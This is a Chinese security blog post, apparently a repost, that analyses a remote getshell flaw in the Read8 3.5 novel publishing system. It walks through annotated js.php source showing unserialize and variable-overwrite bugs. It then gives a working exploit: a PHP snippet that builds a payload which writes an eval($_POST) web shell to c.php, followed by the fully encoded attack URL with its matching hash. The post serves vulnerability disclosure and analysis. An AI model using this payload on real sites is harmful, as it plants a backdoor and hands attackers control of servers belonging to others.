./js.php $arguments = $hash = ''; 02 isset($_GET['argument']) && $argument = $_GET['argument']; 03 isset($_GET['hash']) && $hash = $_GET['hash']; 04 $arguments = unserialize(base64_decode($argument)); //$arguments参数来自get (serialize一下在base64_encode一下。。) 05 print_r($arguments); 06 if(empty($arguments) || !is_array($arguments)) 07 jsdie('Bad Request. Please check your argument.'); 08 if(empty($hash) || $hash != md5($argument)) //条件1 09 jsdie('Bad Request. Please check your hash.'); 10 11 echo __TAB_NOVEL__; 12 foreach($arguments as $k => $v) //变量覆盖 往下看 13 $$k = $v; 14 echo "<h1>$YXNkYXNk||".$_SYSTEM['SYSTEM']['SITE_ADDR']."</h1>"; 15 16 if(empty($limit) || !ris_int($limit)) //条件2 17 jsdie('Bad Request. Please limit a number.'); 18 省略若干 19 20 switch($kind) { 21 case 'vip': 22 $table = __TAB_NOVEL__; 23 $where = 'vip = 1'; 24 break; 25 case 'original': 26 $table = __TAB_NOVEL__; 27 $where = 'author_id > 0'; 28 break; 29 case 'copied': 30 $table = __TAB_NOVEL__; 31 $where = 'author_id = 0'; 32 break; 33 default : 34 $args = explode('_', $subject); 35 if(count($args) == 3 && $args[2] && ris_int($args[2])) { 36 $table = $args[0] == 'story' ? __TAB_STORY__ : __TAB_NOVEL__; 37 $where = ($args[1] == 'content' ? 'content' : 'subject').' = '.$args[2]; 38 } 39 break; 40 } 41 42 if(!$table) //条件3 43 jsdie('Bad Request. Please choose a method.'); 44 45 $jscachefile = ROOT."data/cache/js_$hash.php"; //hash是get进来的。。 46 47 $update = false; 48 if(!file_exists($jscachefile) || (TIMESTAMP - filemtime($jscachefile) >= $cachetime)) 49 $update = true; 50 51 if($update) { 52 $content = "<?php if(!defined('IN_Read8')) exit('Access Denied'); ?>\n"; //必须在被执行文件里包含 继续看 53 54 //$sql = "SELECT b.id, b.title, b.type_id, b.author, c.dateline, c.title as chapter_title, c.$cid AS cid, v.name as volume_name FROM ".__TAB_BOOK__." b LEFT JOIN ".__TAB_CHAPTER__." c ON b.newchapterid=c.id LEFT JOIN ".__TAB_VOLUME__." v ON v.id=c.volume_id WHERE $where ORDER BY b.updatetime DESC LIMIT $limit"; 55 //$result=$db->query($sql); 56 $wblock = $db->select(array( 57 'field' => 'id, title, author, subject, content, dateline, lastupdate', 58 'from' => $table, 59 'where' => 'WHERE state IN (1, 2, 3) AND '.$where, 60 'order' => 'lastupdate DESC', 61 'limit' => $limit, 62 'filter'=> 'convert_'.($table == __TAB_NOVEL__ ? 'novel' : 'story').'_classes', 63 )); 64 65 $wblock = replace(html_show($wblock, false)); 66 if(!empty($charset) && $charset != SYSCHARSET) $wblock = convert($wblock, SYSCHARSET, $charset); 67 68 addjs('document.writeln("<style type=\"text/css\" />");'); 69 addjs('document.writeln(" .update div.content {background: #F7F7F7;margin-top: 1px;width: 100%;padding: 5px 0;}");'); 70 addjs('document.writeln(" .update div div.left {float: left;margin-left: 3px;width: 70%;}");'); 71 addjs('document.writeln(" .update div div.right {float: right;margin-right: 3px;width: 20%;}");'); 72 addjs('document.writeln("</style>");'); 73 addjs('document.writeln("<div class=\"update\">");'); 74 75 $external = empty($openewindow) ? '' : ($openewindow == 'target' ? ' target=\"_blank\"' : (($openewindow == 'rel') ? ' rel=\"external\"' : '')); 76 foreach($wblock as $val) { 77 addjs('document.writeln("<table>");'); //我们利用变量覆盖 覆盖掉$_SYSTEM['SYSTEM']['SITE_ADDR']. 即可 78 addjs('document.writeln("<tr><td align=\"left\" width=\"70%\"> ['.$val['subject'].'] <a href=\"'.$_SYSTEM['SYSTEM']['SITE_ADDR'].'/'.($table == __TAB_NOVEL__ ? 'novel' : 'story').'.php?bid='.$val['id'].'\"'.$external.' style=\"color: Green;\">'.$val['title'].'</a> </td>");'); 79 80 addjs('document.writeln("<td align=\"right\" width=\"30%\">'.$val['author'].'</a> <'.rdate($val['lastupdate'], 'm-d').'></td></tr>");'); 81 addjs('document.writeln("</table>");'); 82 } 83 unset($wblock); 84 85 addjs('document.writeln("</div>");'); 86 87 ; 88 if(!rfow($jscachefile, $content)) //rfow函数就是file put contents 代码我就不贴了 89 jsdie('Can\'t write cache file. Please check your permission.'); 90 } 91 92 (!include $jscachefile) && jsdie('Can\'t read cache file. Please check your permission.'); //包含 看起来和dede那段代码很像啊利用方法: 93 94 95 <?php 96 $a=array("limit"=>'1','_SYSTEM'=>array('SYSTEM'=>array('SITE_ADDR'=>"<?php file_put_contents('./c.php','<?php eval(\$_POST[s])?>')?>")),'kind'=>'original'); 97 echo serialize($a); 98 ?> 生成一个serialize后的数组然后base64一下 www.2cto.com 然后再md5一下url:/js.php? argument=YTozOntzOjU6ImxpbWl0IjtzOjE6IjEiO3M6NzoiX1NZU1RFTSI7YToxOntzOjY6IlNZU1RFTSI7YToxOntzOjk6IlNJVEVfQUREUiI7czo2MjoiPD9waHAgZmlsZV9wdXRfY29udGVudHMoJy4vYy5waHAnLCc8P3BocCBldmFsKCRfUE9TVFtzXSk/PicpPz4iO319czo0OiJraW5kIjtzOjg6Im9yaWdpbmFsIjt9&hash=ccfe8712c8669cf53b3a049f7872de86 这个 漏洞 和dede的有点像 都是一个变量覆盖 然后查询 数据库 然后写出文件 然后包含 过程比较像而已。。本地测试。。 1 <A id=ematt:90 href="/content/uploadfile/201203/eb9fcafce2f193e736c0f60f295b838020120317035959.png" target=_blank jQuery1332059982027="6"><IMG border=0 alt=点击查看原图src="/content/uploadfile/201203/thum-eb9fcafce2f193e736c0f60f295b838020120317035959.png"></A> 作者 狗一样的男人
查看更多关于read8 3.5读吧源代码分析 一个小说发布系统getshe的详细内容...